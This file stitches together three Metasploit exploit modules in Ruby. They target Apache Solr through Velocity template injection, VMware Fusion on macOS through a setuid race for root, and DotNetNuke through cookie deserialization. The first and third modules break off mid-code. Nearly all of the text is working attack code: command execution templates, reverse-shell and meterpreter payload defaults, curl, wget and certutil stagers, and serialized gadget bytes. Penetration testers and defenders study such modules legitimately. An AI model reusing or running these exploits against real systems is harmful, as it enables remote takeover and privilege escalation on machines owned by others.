##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core/exploit/powershell'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::CmdStager
  include Msf::Exploit::Powershell
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
'Name'           => 'Apache Solr Remote Code Execution via Velocity Template',
'Description'    => %q(
          This module exploits a vulnerability in Apache Solr <= 8.3.0 which allows remote code execution via a custom
          Velocity template. Currently, this module only supports Solr basic authentication.

          From the Tenable advisory:
          An attacker could target a vulnerable Apache Solr instance by first identifying a list
          of Solr core names. Once the core names have been identified, an attacker can send a specially crafted
          HTTP POST request to the Config API to toggle the params resource loader value for the Velocity Response
          Writer in the solrconfig.xml file to true. Enabling this parameter would allow an attacker to use the Velocity
          template parameter in a specially crafted Solr request, leading to RCE.
        ),
'License'        => MSF_LICENSE,
'Author'         =>
          [
's00py', # Discovery and PoC
'jas502n', # exploit code on Github
'AleWong', # ExploitDB contribution, and exploit code on Github
'Imran E. Dawoodjee <imran[at]threathounds.com>' # Metasploit module
          ],
'References'     =>
            [
              [ 'EDB', '47572' ],
              [ 'CVE', '2019-17558' ],
              [ 'URL', 'https://www.tenable.com/blog/apache-solr-vulnerable-to-remote-code-execution-zero-day-vulnerability'],
              [ 'URL', 'https://www.huaweicloud.com/en-us/notice/2018/20191104170849387.html'],
              [ 'URL', 'https://gist.github.com/s00py/a1ba36a3689fa13759ff910e179fc133/'],
              [ 'URL', 'https://github.com/jas502n/solr_rce'],
              [ 'URL', 'https://github.com/AleWong/Apache-Solr-RCE-via-Velocity-template'],
            ],
'Platform'       => ['linux', 'unix', 'win'],
'Targets'        =>
            [
              [
'Unix (in-memory)',
                {
'Platform'       => 'unix',
'Arch'           => ARCH_CMD,
'Type'           => :unix_memory,
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
                }
              ],
              [
'Linux (dropper)',
                {
'Platform'        => 'linux',
'Arch'            => [ARCH_X86, ARCH_X64],
'Type'            => :linux_dropper,
'DefaultOptions'  => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' },
'CmdStagerFlavor' => %w[curl wget]
                }
              ],
              [
'x86/x64 Windows PowerShell',
                {
'Platform'        => 'win',
'Arch'            => [ARCH_X86, ARCH_X64],
'Type'            => :windows_psh,
'DefaultOptions'  => { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' }
                }
              ],
              [
'x86/x64 Windows CmdStager',
                {
'Platform'        => 'win',
'Arch'            => [ARCH_X86, ARCH_X64],
'Type'            => :windows_cmdstager,
'DefaultOptions'  => { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp', 'CmdStagerFlavor' => 'vbs' },
'CmdStagerFlavor' => %w[vbs certutil]
                }
              ],
              [
'Windows Exec',
                {
'Platform'        => 'win',
'Arch'            => ARCH_CMD,
'Type'            => :windows_exec,
'DefaultOptions'  => { 'PAYLOAD' => 'cmd/windows/generic' }
                }
              ],
            ],
'DisclosureDate' => "2019-10-29", # ISO-8601 formatted
'DefaultTarget'  => 0,
'Privileged'     => false
      )
    )

    register_options(
      [
        Opt::RPORT(8983),
        OptString.new('USERNAME', [false, 'Solr username', 'solr']),
        OptString.new('PASSWORD', [false, 'Solr password', 'SolrRocks']),
        OptString.new('TARGETURI', [false, 'Path to Solr', '/solr/'])
      ]
    )
  end

  # if we are going to exploit, we only need one core to be exploitable
  @vuln_core = ""
  # OS specific stuff
  @target_platform = ""
  # if authentication is used
  @auth_string = ""

  def check_auth
    # see if authentication is required for the specified Solr instance
    auth_check = solr_get('uri' => normalize_uri(target_uri.path))

    # successfully connected?
    unless auth_check
      print_bad("Connection failed!")
      return nil
    end

    # if response code is not 200, then the Solr instance definitely requires authentication
    unless auth_check.code == 200
      # if authentication is required and creds are not provided, we cannot reliably check exploitability
      if datastore['USERNAME'] == ""&& datastore['PASSWORD'] == ""
        print_bad("Credentials not provided, skipping credentialed check...")
        return nil
      end

      # otherwise, try the given creds
      auth_string = basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
      attempt_auth = solr_get('uri' => normalize_uri(target_uri.path), 'auth' => auth_string)

      # successfully connected?
      unless attempt_auth
        print_bad("Connection failed!")
        return nil
      end
      # if the return code is not 200, then authentication definitely failed
      unless attempt_auth.code == 200
        print_bad("Invalid credentials!")
        return nil
      end

      store_valid_credential(
        user: datastore['USERNAME'],
        private: datastore['PASSWORD'],
        private_type: :password,
        proof: attempt_auth.to_s
      )

      @auth_string = auth_string
    end
    # a placeholder return value. Not requiring auth should throw no errors
""
  end

  # check for vulnerability existence
  def check
    auth_res = check_auth
    unless auth_res
      return CheckCode::Unknown("Authentication failed!")
    end

    # send a GET request to get Solr and system details
    ver = solr_get('uri' => normalize_uri(target_uri.path, '/admin/info/system'), 'auth' => @auth_string)

    # can't connect? that's an automatic failure
    unless ver
      return CheckCode::Unknown("Connection failed!")
    end

    # convert to JSON
    ver_json = ver.get_json_document
    # get Solr version
    solr_version = Gem::Version.new(ver_json['lucene']['solr-spec-version'])
    print_status("Found Apache Solr #{solr_version}")
    # get OS version details
    @target_platform = ver_json['system']['name']
    target_arch = ver_json['system']['arch']
    target_osver = ver_json['system']['version']
    print_status("OS version is #{@target_platform} #{target_arch} #{target_osver}")
    # uname doesn't show up for Windows, so run a check for that
    if ver_json['system']['uname']
      # print uname only when verbose
      vprint_status("Full uname is '#{ver_json['system']['uname'].strip}'")
    end

    # the vulnerability is only present in Solr versions <= 8.3.0
    unless solr_version <= Gem::Version.new('8.3.0')
      return CheckCode::Safe("Running version of Solr is not vulnerable!")
    end

    # enumerate cores
    cores = solr_get('uri' => normalize_uri(target_uri.path, '/admin/cores'), 'auth' => @auth_string)

    # can't connect? that's yet another automatic failure
    unless cores
      return CheckCode::Unknown("Could not enumerate cores!")
    end

    # convert to JSON yet again
    cores_json = cores.get_json_document
    # draw up an array of all the cores
    cores_list = Array.new
    # get the core names
    cores_json['status'].keys.each do |core_name|
      cores_list.push(core_name)
    end

    # no cores? that means nothing to exploit.
    if cores_list.empty?
      return CheckCode::Safe("No cores found, nothing to exploit!")
    end

    # got cores? tell the operator which cores were found
    print_status("Found core(s): #{cores_list.join(', ')}")
    possibly_vulnerable_cores = {}

    cores_list.each do |core|
      # for each core, attempt to get config
      core_config = solr_get('uri' => normalize_uri(target_uri.path, core.to_s, 'config'), 'auth' => @auth_string)

      # can't retrieve configuration for that core? go next
      unless core_config
        print_error("Could not retrieve configuration for core #{core}!")
        next
      end

      # convert to JSON
      core_config_json = core_config.get_json_document
      # if the core configuration does not include the Velocity Response Writer, it isn't vulnerable
      if core_config_json['config']['queryResponseWriter'].keys.include?("velocity")
        vprint_good("Found Velocity Response Writer in use by core #{core}")
        if core_config_json['config']['queryResponseWriter']['velocity']['params.resource.loader.enabled'] == "true"
          vprint_good("params.resource.loader.enabled for core '#{core}' is set to true.")
          possibly_vulnerable_cores.store(core, true)
        else
          # if params.resource.loader.enabled is false, we need to set it to true before exploitation
          print_warning("params.resource.loader.enabled for core #{core} is set to false.")
          possibly_vulnerable_cores.store(core, false)
        end
      else
        vprint_error("Velocity Response Writer not found in core #{core}")
        next
      end
    end

    # look at the array of possibly vulnerable cores
    if possibly_vulnerable_cores.empty?
      CheckCode::Safe("No cores are vulnerable!")
    else
      # if possible, pick a core that already has params.resource.loader.enabled set to true
      possibly_vulnerable_cores.each do |core|
        if core[1] == true
          @vuln_core = core
          break
        end
      end
      # otherwise, just pick the first one
      if @vuln_core.to_s == ""
        @vuln_core = possibly_vulnerable_cores.first
      end
      CheckCode::Vulnerable
    end
  end

  # the exploit method
  def exploit
    unless [CheckCode::Vulnerable].include? check
      fail_with Failure::NotVulnerable, "Target is most likely not vulnerable!"
    end

    print_status("Targeting core '#{@vuln_core[0]}'")

    # if params.resource.loader.enabled for that core is false
    if @vuln_core[1] != true
      # the new config in JSON format
      enable_params_resource_loader = {
"update-queryresponsewriter": {
"startup": "lazy",
"name": "velocity",
"class": "solr.VelocityResponseWriter",
"template.base.dir": "",
"solr.resource.loader.enabled": "true",
"params.resource.loader.enabled": "true"
        }
      }.to_json

      opts_post = {
'method'        => 'POST',
'connection'    => 'Keep-Alive',
'ctype'         => 'application/json;charset=utf-8',
'encode_params' => false,
'uri'           => normalize_uri(target_uri.path, @vuln_core[0].to_s, 'config'),
'data'          => enable_params_resource_loader
      }

      unless @auth_string == ""
        opts_post.store('authorization', @auth_string)
      end

      print_status("params.resource.loader.enabled is false, setting it to true...")
      update_config = send_request_cgi(opts_post)

      unless update_config
        fail_with Failure::Unreachable, "Connection failed!"
      end

      # if we got anything other than a 200 back, the configuration update failed and the exploit won't work
      unless update_config.code == 200
        fail_with Failure::UnexpectedReply, "Unable to update config, exploit failed!"
      end

      print_good("params.resource.loader.enabled is now set to true!")
    end

    # windows...
    if @target_platform.include? "Windows"
      # if target is wrong, warn and exit before doing anything
      unless target.name.include? "Windows"
        fail_with Failure::NoTarget, "Target is found to be Windows, please select the proper target!"
      end

      case target['Type']
      # PowerShell...
      when :windows_psh
        # need PowerShell for this
        winenv_path = execute_command("C:\\Windows\\System32\\cmd.exe /c PATH", 'auth_string' => @auth_string, 'core_name' => @vuln_core[0], 'winenv_check' => true)
        unless winenv_path
          fail_with Failure::Unreachable, "Connection failed!"
        end

        # did the command to check for PATH execute?
        unless winenv_path.code == 200
          fail_with Failure::UnexpectedReply, "Unexpected reply from target, aborting!"
        end

        # is PowerShell in PATH?
        if /powershell/i =~ winenv_path.body.to_s
          # only interested in the contents of PATH. Everything before it is irrelevant
          paths = winenv_path.body.split('=')[1]
          # confirm that PowerShell exists in the PATH by checking each one
          paths.split(';').each do |path_val|
            # if PowerShell exists in PATH, then we are good to go
            unless /powershell/i =~ path_val
              next
            end

            print_good("Found Powershell at #{path_val}")
            # generate PowerShell command, encode with base64, and remove comspec
            psh_cmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, remove_comspec: true)
            # specify full path to PowerShell
            psh_cmd.insert(0, path_val)
            # exploit the thing
            execute_command(psh_cmd, 'auth_string' => @auth_string, 'core_name' => @vuln_core[0])
            break
          end
        else
          fail_with Failure::BadConfig, "PowerShell not found!"
        end
      # ... CmdStager ...
      when :windows_cmdstager
        print_status("Sending CmdStager payload...")
        execute_cmdstager(linemax: 7130, 'auth_string' => @auth_string, 'core_name' => @vuln_core[0])
      # ... or plain old exec?
      when :windows_exec
        cmd = "C:\\Windows\\System32\\cmd.exe /c #{payload.encoded}"
        execute_command(cmd, 'auth_string' => @auth_string, 'core_name' => @vuln_core[0])
      end
    end

    # ... or nix-based?
    if @target_platform.include? "Linux"
      # if target is wrong, warn and exit before doing anything
      if target.name.include? "Windows"
        fail_with Failure::NoTarget, "Target is found to be nix-based, please select the proper target!"
      end

      case target['Type']
      when :linux_dropper
        execute_cmdstager('auth_string' => @auth_string, 'core_name' => @vuln_core[0])
      when :unix_memory
        cmd = "/bin/bash -c $@|/bin/bash . echo #{payload.encoded}"
        execute_command(cmd, 'auth_string' => @auth_string, 'core_name' => @vuln_core[0])
      end
    end
  end

  # some prep work has to be done to work around the limitations of Java's Runtime.exec()
  def execute_cmdstager_begin(_opts)
    if @target_platform.include? "Windows"
      @cmd_list.each do |command|
        command.insert(0, "C:\\Windows\\System32\\cmd.exe /c ")
      end
    else
      @cmd_list.each do |command|
        command.insert(0, "/bin/bash -c $@|/bin/bash . echo ")
      end
    end
  end

  # sic 'em, bois!
  def execute_command(cmd, opts = {})
    # custom template which enables command execution
    template = <<~VELOCITY
      #set($x="")
      #set($rt=$x.class.forName("java.lang.Runtime"))
      #set($chr=$x.class.forName("java.lang.Character"))
      #set($str=$x.class.forName("java.lang.String"))
    VELOCITY

    # attempts to solve the quoting problem, partially successful
    if target.name.include?("Unix")
      template += <<~VELOCITY
        #set($ex=$rt.getRuntime().exec("#{cmd}"))
      VELOCITY
    else
      template += <<~VELOCITY
        #set($ex=$rt.getRuntime().exec('#{cmd}'))
      VELOCITY
    end

    template += <<~VELOCITY
      $ex.waitFor()
    VELOCITY

    # the next 2 lines cause problems with CmdStager, so it's only used when needed
    # during the check for PowerShell existence, or by specific payloads
    if opts['winenv_check'] || target['Type'] == :windows_exec || target['Type'] == :unix_memory
      template += <<~VELOCITY
        #set($out=$ex.getInputStream())
        #if($out.available())
        #foreach($i in [1..$out.available()])$str.valueOf($chr.toChars($out.read()))

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::OSX::Priv
  include Msf::Post::File
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(
      update_info(
        info,
'Name'           => 'VMware Fusion USB Arbitrator Setuid Privilege Escalation',
'Description'    => %q(
          This exploits an improper use of setuid binaries within VMware Fusion 10.1.3 - 11.5.3.
          The Open VMware USB Arbitrator Service can be launched outide of its standard path
          which allows loading of an attacker controlled binary.  By creating a payload in the
          user home directory in a specific folder, and creating a hard link to the 'Open VMware
          USB Arbitrator Service' binary, we're able to launch it temporarily to start our payload
          with an effective UID of 0.
          @jeffball55 discovered an incomplete patch in 11.5.3 with a TOCTOU race.
          Successfully tested against 10.1.6, 11.5.1, 11.5.2, and 11.5.3.
        ),
'License'        => MSF_LICENSE,
'Author'         =>
          [
'h00die', # msf module
'Dhanesh Kizhakkinan', # discovery
'Rich Mirch', # edb module
'jeffball <jeffball@dc949.org>', # 11.5.3 exploit
'grimm'
          ],
'Platform'       => [ 'osx' ],
'Arch'           => [ ARCH_X86, ARCH_X64 ],
'SessionTypes'   => [ 'shell', 'meterpreter' ],
'Targets'        => [[ 'Auto', {} ]],
'Privileged'     => true,
'References'     =>
          [
            [ 'CVE', '2020-3950' ],
            [ 'EDB', '48235' ],
            [ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2020-0005.html' ],
            [ 'URL', 'https://twitter.com/jeffball55/status/1242530508053110785?s=20' ],
            [ 'URL', 'https://github.com/grimm-co/NotQuite0DayFriday/blob/master/2020.03.17-vmware-fusion/notes.txt' ]
          ],
'DisclosureDate' => 'Mar 17 2020',
'DefaultOptions' =>
          {
'PAYLOAD'    => 'osx/x64/meterpreter_reverse_tcp',
'WfsDelay'   => 15
          }
      )
    )

    register_options [
      OptInt.new('MAXATTEMPTS', [true, 'Maximum attempts to win race for 11.5.3', 75])
    ]

    register_advanced_options [
      OptBool.new('ForceExploit', [false, 'Override check result', false])
    ]
  end

  def open_usb_service
'Open VMware USB Arbitrator Service'
  end

  def usb_service
'VMware USB Arbitrator Service'
  end

  def get_home_dir
    home = cmd_exec 'echo ~'
    if home.blank?
      fail_with Failure::BadConfig, 'Unable to determine home dir for shell.'
    end
    home
  end

  def content_dir
"#{get_home_dir}/Contents"
  end

  def base_dir
"#{content_dir}/Library/services/"
  end

  def kill_process(executable)
    pid_kill = cmd_exec %(ps ax | grep #{executable} | grep -v grep | awk '{print "kill -9 " $1}')
    cmd_exec pid_kill
  end

  def get_version
    # Thanks to @ddouhine on github for this answer!
    version_raw = cmd_exec "plutil -p '/Applications/VMware Fusion.app/Contents/Info.plist' | grep CFBundleShortVersionString"
    /=> "(?<version>\d{0,2}\.\d{0,2}\.\d{0,2})"/ =~ version_raw #supposed 11.x is also vulnerable, but everyone whos tested shows 11.5.1 or 11.5.2
    if version_raw.blank?
      fail_with Failure::BadConfig, 'Unable to determine VMware Fusion version.  Set ForceExploit to override.'
    end
    Gem::Version.new(version)
  end

  def pre_11_5_3
    # Upload payload executable & chmod
    payload_filename = "#{base_dir}#{usb_service}"
    print_status "Uploading Payload: #{payload_filename}"
    write_file payload_filename, generate_payload_exe
    chmod payload_filename, 0o755
    register_file_for_cleanup payload_filename

    # create folder structure and hard link to the original binary
    root_link_folder = "#{get_home_dir}/#{rand_text_alphanumeric(2..5)}" # for cleanup later
    link_folder = "#{root_link_folder}/#{rand_text_alphanumeric(2..5)}/#{rand_text_alphanumeric(2..5)}/"
    cmd_exec "mkdir -p #{link_folder}"
    cmd_exec "ln '/Applications/VMware Fusion.app/Contents/Library/services/#{open_usb_service}''#{link_folder}#{open_usb_service}'"
    print_status "Created folder (#{link_folder}) and link"

    print_status 'Starting USB Service (5 sec pause)'
    # XXX: The ; used by cmd_exec will interfere with &, so pad it with :
    cmd_exec "cd #{link_folder}; '#{link_folder}/#{open_usb_service}'& :"
    Rex.sleep 5 # give time for the service to execute our payload
    print_status 'Killing service'
    cmd_exec "pkill '#{open_usb_service}'"
    print_status "Deleting #{root_link_folder}"
    rm_rf root_link_folder
  end

  def exactly_11_5_3
    # Upload payload executable & chmod
    payload_name = "#{base_dir}#{rand_text_alphanumeric(5..10)}"
    print_status "Uploading Payload to #{payload_name}"
    write_file payload_name, generate_payload_exe
    chmod payload_name, 0o755
    #create race with codesign check
    root_link_folder = "#{get_home_dir}/#{rand_text_alphanumeric(2..5)}" # for cleanup later
    link_folder = "#{root_link_folder}/#{rand_text_alphanumeric(2..5)}/#{rand_text_alphanumeric(2..5)}/"
    print_status 'Uploading race condition executable.'
    race = <<~EOF
      #!/bin/sh
      while [ "1" = "1" ]; do
          ln -f '/Applications/VMware Fusion.app/Contents/Library/services/#{usb_service}''#{base_dir}#{usb_service}'
          ln -f '#{payload_name}''#{base_dir}#{usb_service}'
      done
    EOF
    racer_name = "#{base_dir}#{rand_text_alphanumeric(5..10)}"
    upload_and_chmodx racer_name, race
    register_file_for_cleanup racer_name
    register_dirs_for_cleanup root_link_folder
    # create the hard link
    print_status "Creating folder (#{link_folder}) and link"
    cmd_exec "mkdir -p #{link_folder}"
    cmd_exec "ln '/Applications/VMware Fusion.app/Contents/Library/services/#{open_usb_service}''#{link_folder}#{open_usb_service}'"

    # create the launcher to start the racer and keep launching our service to attempt to win
    launcher = <<~EOF
      #!/bin/sh
      #{racer_name} &
      for i in {1..#{datastore['MAXATTEMPTS']}}
      do
          echo "attempt $i";
'#{link_folder}#{open_usb_service}'
      done
    EOF
    runner_name = "#{base_dir}#{rand_text_alphanumeric(5..10)}"
    upload_and_chmodx runner_name, launcher
    register_file_for_cleanup runner_name

    print_status "Launching Exploit #{runner_name} (sleeping 15sec)"
    # XXX: The ; used by cmd_exec will interfere with &, so pad it with :
    results = cmd_exec "#{runner_name} & :"
    Rex.sleep 15 # give time for the service to execute our payload
    vprint_status results

    print_status 'Exploit Finished, killing scripts.'
    kill_process racer_name
    kill_process runner_name # in theory should be killed already but just in case
    kill_process "'#{link_folder}#{open_usb_service}'"
    # kill_process 'ln' a rogue ln -f may mess us up, but killing them seemed to be unreliable and mark the exploit as failed.
    # above caused: [-] Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_sys_process_execute: Operation failed: Unknown error
    # rm_rf base_dir # this always fails. Leaving it here as a note that when things dont kill well, can't delete the folder
  end

  def check
    unless exists? "/Applications/VMware Fusion.app/Contents/Library/services/#{open_usb_service}"
      print_bad "'#{open_usb_service}' binary missing"
      return CheckCode::Safe
    end
    version = get_version
    if version.between?(Gem::Version.new('10.1.3'), Gem::Version.new('11.5.3'))
      vprint_good "Vmware Fusion #{version} is exploitable"
    else
      print_bad "VMware Fusion #{version} is NOT exploitable"
      return CheckCode::Safe
    end
    CheckCode::Appears
  end

  def exploit
    # First check the system is vulnerable, or the user wants to run regardless
    unless check == CheckCode::Appears
      unless datastore['ForceExploit']
        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
      end
      print_warning 'Target does not appear to be vulnerable'
    end

    # Check if we're already root
    if is_root?
      unless datastore['ForceExploit']
        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override'
      end
    end

    # Make sure we can write our payload to the remote system
    rm_rf content_dir # live dangerously.
    if directory? content_dir
      fail_with Filure::BadConfig, "#{content_dir} exists. Unable to delete automatically.  Please delete or exploit will fail."
    end
    cmd_exec "mkdir -p #{base_dir}"
    register_dirs_for_cleanup content_dir
    unless writable? base_dir
      fail_with Failure::BadConfig, "#{base_dir} is not writable."
    end

    version = get_version
    if version == Gem::Version.new('11.5.3')
      vprint_status 'Using 11.5.3 exploit'
      exactly_11_5_3
    elsif version.between?(Gem::Version.new('10.1.3'), Gem::Version.new('11.5.2'))
      vprint_status 'Using pre-11.5.3 exploit'
      pre_11_5_3
    end
    rm_rf content_dir # live dangerously.
  end
end

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core/exploit/powershell'
require 'openssl'
require 'set'

class MetasploitModule < Msf::Exploit::Remote
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Powershell
  include Msf::Exploit::Remote::HttpServer

  Rank = ExcellentRanking

  # =================================
  # Overidden setup method to allow
  # for delayed handler start
  # =================================
  def setup
    # Reset the session counts to zero.
    reset_session_counts

    return if !payload_instance
    return if !handler_enabled?

    # Configure the payload handler
    payload_instance.exploit_config = {
'active_timeout' => active_timeout
    }

    # payload handler is normally set up and started here
    # but has been removed so we can start the handler when needed.
  end

  def initialize(info = {})
    super(update_info(
      info,
'Name'           => "DotNetNuke Cookie Deserialization Remote Code Excecution",
'Description'    => %q(
        This module exploits a deserialization vulnerability in DotNetNuke (DNN) versions 5.0.0 to 9.3.0-RC.
        Vulnerable versions store profile information for users in the DNNPersonalization cookie as XML.
        The expected structure includes a "type" attribute to instruct the server which type of object to create on deserialization.
        The cookie is processed by the application whenever it attempts to load the current user's profile data.
        This occurs when DNN is configured to handle 404 errors with its built-in error page (default configuration).
        An attacker can leverage this vulnerability to execute arbitrary code on the system.
      ),
'License'        => MSF_LICENSE,
'Author'         => [ 'Jon Park', 'Jon Seigel' ],
'References'     =>
        [
          [ 'CVE', '2017-9822' ],
          [ 'CVE', '2018-15811'],
          [ 'CVE', '2018-15812'],
          [ 'CVE', '2018-18325'], # due to failure to patch CVE-2018-15811
          [ 'CVE', '2018-18326'], # due to failure to patch CVE-2018-15812
          [ 'URL', 'https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf'],
          [ 'URL', 'https://googleprojectzero.blogspot.com/2017/04/exploiting-net-managed-dcom.html'],
          [ 'URL', 'https://github.com/pwntester/ysoserial.net']
        ],
'Platform'       => 'win',
'Targets'        =>
        [
          [ 'Automatic', { 'auto' => true } ],
          [ 'v5.0 - v9.0.0', { 'ReqEncrypt' => false, 'ReqSession' => false } ],
          [ 'v9.0.1 - v9.1.1', { 'ReqEncrypt' => false, 'ReqSession' => false } ],
          [ 'v9.2.0 - v9.2.1', { 'ReqEncrypt' => true, 'ReqSession' => true } ],
          [ 'v9.2.2 - v9.3.0-RC', { 'ReqEncrypt' => true, 'ReqSession' => true } ]
        ],
'Stance' => Msf::Exploit::Stance::Aggressive,
'Payload'        =>
        {

        },
'Privileged'     => false,
'DisclosureDate' => "Jul 20 2017",
'DefaultOptions' => { 'WfsDelay' => 5 },
'DefaultTarget'  => 0
    ))

    deregister_options('SRVHOST')

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The path that will result in the DNN 404 response', '/__']),
        OptBool.new('DryRun', [false, 'Performs target version check, finds encryption KEY and IV values if required, and outputs a cookie payload', false]),
        OptString.new('VERIFICATION_PLAIN', [false, %q(The known (full or partial) plaintext of the encrypted verification code.
        Typically in the format of {portalID}-{userID} where portalID is an integer and userID is either an integer or GUID (v9.2.2+)), '']),
        OptBool.new('ENCRYPTED', [true, %q(Whether or not to encrypt the final payload cookie;
        (VERIFICATION_CODE and VERIFICATION_PLAIN) or (KEY and IV) are required if set to true.), false]),
        OptString.new('KEY', [false, 'The key to use for encryption.', '']),
        OptString.new('IV', [false, 'The initialization vector to use for encryption.', '']),
        OptString.new('SESSION_TOKEN', [false, %q(The .DOTNETNUKE session cookie to use when submitting the payload to the target server.
        DNN versions 9.2.0+ require the attack to be submitted from an authenticated context.), '']),
        OptString.new('VERIFICATION_CODE', [false, %q(The encrypted verification code received in a registration email.
        Can also be the path to a file containing a list of verification codes.), ''])
      ]
    )


    initialize_instance_variables
  end

  def initialize_instance_variables
    # ==================
    # COMMON VARIABLES
    # ==================

    @target_idx = 0

    # Flag for whether or not to perform exploitation
    @dry_run = false

    # Flag for whether or not the target requires encryption
    @encrypted = false

    # Flag for whether or not to attempt to decrypt the provided verification token(s)
    @try_decrypt = false

    # ==================
    # PAYLOAD VARIABLES
    # ==================

    # ObjectStateFormatter serialized header
    @osf_header = [255, 1, 50]

    # ObjectStateFormatter serialized data before the command payload
    @osf_wrapper_start = [
      0, 1, 0, 0, 0, 255, 255, 255, 255, 1, 0, 0, 0, 0, 0, 0, 0, 12, 2, 0, 0, 0, 73,
      83, 121, 115, 116, 101, 109, 44, 32, 86, 101, 114, 115, 105, 111, 110, 61, 52,
      46, 48, 46, 48, 46, 48, 44, 32, 67, 117, 108, 116, 117, 114, 101, 61, 110, 101,
      117, 116, 114, 97, 108, 44, 32, 80, 117, 98, 108, 105, 99, 75, 101, 121, 84,
      111, 107, 101, 110, 61, 98, 55, 55, 97, 53, 99, 53, 54, 49, 57, 51, 52, 101,
      48, 56, 57, 5, 1, 0, 0, 0, 132, 1, 83, 121, 115, 116, 101, 109, 46, 67, 111,
      108, 108, 101, 99, 116, 105, 111, 110, 115, 46, 71, 101, 110, 101, 114, 105,
      99, 46, 83, 111, 114, 116, 101, 100, 83, 101, 116, 96, 49, 91, 91, 83, 121,
      115, 116, 101, 109, 46, 83, 116, 114, 105, 110, 103, 44, 32, 109, 115, 99, 111,
      114, 108, 105, 98, 44, 32, 86, 101, 114, 115, 105, 111, 110, 61, 52, 46, 48,
      46, 48, 46, 48, 44, 32, 67, 117, 108, 116, 117, 114, 101, 61, 110, 101, 117,
      116, 114, 97, 108, 44, 32, 80, 117, 98, 108, 105, 99, 75, 101, 121, 84, 111,
      107, 101, 110, 61, 98, 55, 55, 97, 53, 99, 53, 54, 49, 57, 51, 52, 101, 48, 56,
      57, 93, 93, 4, 0, 0, 0, 5, 67, 111, 117, 110, 116, 8, 67, 111, 109, 112, 97,
      114, 101, 114, 7, 86, 101, 114, 115, 105, 111, 110, 5, 73, 116, 101, 109, 115,
      0, 3, 0, 6, 8, 141, 1, 83, 121, 115, 116, 101, 109, 46, 67, 111, 108, 108, 101,
      99, 116, 105, 111, 110, 115, 46, 71, 101, 110, 101, 114, 105, 99, 46, 67, 111,
      109, 112, 97, 114, 105, 115, 111, 110, 67, 111, 109, 112, 97, 114, 101, 114,
      96, 49, 91, 91, 83, 121, 115, 116, 101, 109, 46, 83, 116, 114, 105, 110, 103,
      44, 32, 109, 115, 99, 111, 114, 108, 105, 98, 44, 32, 86, 101, 114, 115, 105,
      111, 110, 61, 52, 46, 48, 46, 48, 46, 48, 44, 32, 67, 117, 108, 116, 117, 114,
      101, 61, 110, 101, 117, 116, 114, 97, 108, 44, 32, 80, 117, 98, 108, 105, 99,
      75, 101, 121, 84, 111, 107, 101, 110, 61, 98, 55, 55, 97, 53, 99, 53, 54, 49,
      57, 51, 52, 101, 48, 56, 57, 93, 93, 8, 2, 0, 0, 0, 2, 0, 0, 0, 9, 3, 0, 0, 0,
      2, 0, 0, 0, 9, 4, 0, 0, 0, 4, 3, 0, 0, 0, 141, 1, 83, 121, 115, 116, 101, 109,
      46, 67, 111, 108, 108, 101, 99, 116, 105, 111, 110, 115, 46, 71, 101, 110, 101,
      114, 105, 99, 46, 67, 111, 109, 112, 97, 114, 105, 115, 111, 110, 67, 111, 109,
      112, 97, 114, 101, 114, 96, 49, 91, 91, 83, 121, 115, 116, 101, 109, 46, 83,
      116, 114, 105, 110, 103, 44, 32, 109, 115, 99, 111, 114, 108, 105, 98, 44, 32,
      86, 101, 114, 115, 105, 111, 110, 61, 52, 46, 48, 46, 48, 46, 48, 44, 32, 67,
      117, 108, 116, 117, 114, 101, 61, 110, 101, 117, 116, 114, 97, 108, 44, 32, 80,
      117, 98, 108, 105, 99, 75, 101, 121, 84, 111, 107, 101, 110, 61, 98, 55, 55,
      97, 53, 99, 53, 54, 49, 57, 51, 52, 101, 48, 56, 57, 93, 93, 1, 0, 0, 0, 11,
      95, 99, 111, 109, 112, 97, 114, 105, 115, 111, 110, 3, 34, 83, 121, 115, 116,
      101, 109, 46, 68, 101, 108, 101, 103, 97, 116, 101, 83, 101, 114, 105, 97, 108,
      105, 122, 97, 116, 105, 111, 110, 72, 111, 108, 100, 101, 114, 9, 5, 0, 0, 0,
      17, 4, 0, 0, 0, 2, 0, 0, 0, 6, 6, 0, 0, 0
    ]

    # ObjectStateFormatter serialized data to place after the command payload.
    @osf_wrapper_end = [
      6, 7, 0, 0, 0, 3, 99, 109, 100, 4, 5, 0, 0, 0, 34, 83, 121, 115, 116, 101,
      109, 46, 68, 101, 108, 101, 103, 97, 116, 101, 83, 101, 114, 105, 97, 108,
      105, 122, 97, 116, 105, 111, 110, 72, 111, 108, 100, 101, 114, 3, 0, 0, 0, 8,
      68, 101, 108, 101, 103, 97, 116, 101, 7, 109, 101, 116, 104, 111, 100, 48, 7,
      109, 101, 116, 104, 111, 100, 49, 3, 3, 3, 48, 83, 121, 115, 116, 101, 109,
      46, 68, 101, 108, 101, 103, 97, 116, 101, 83, 101, 114, 105, 97, 108, 105,
      122, 97, 116, 105, 111, 110, 72, 111, 108, 100, 101, 114, 43, 68, 101, 108,
      101, 103, 97, 116, 101, 69, 110, 116, 114, 121, 47, 83, 121, 115, 116, 101,
      109, 46, 82, 101, 102, 108, 101, 99, 116, 105, 111, 110, 46, 77, 101, 109,
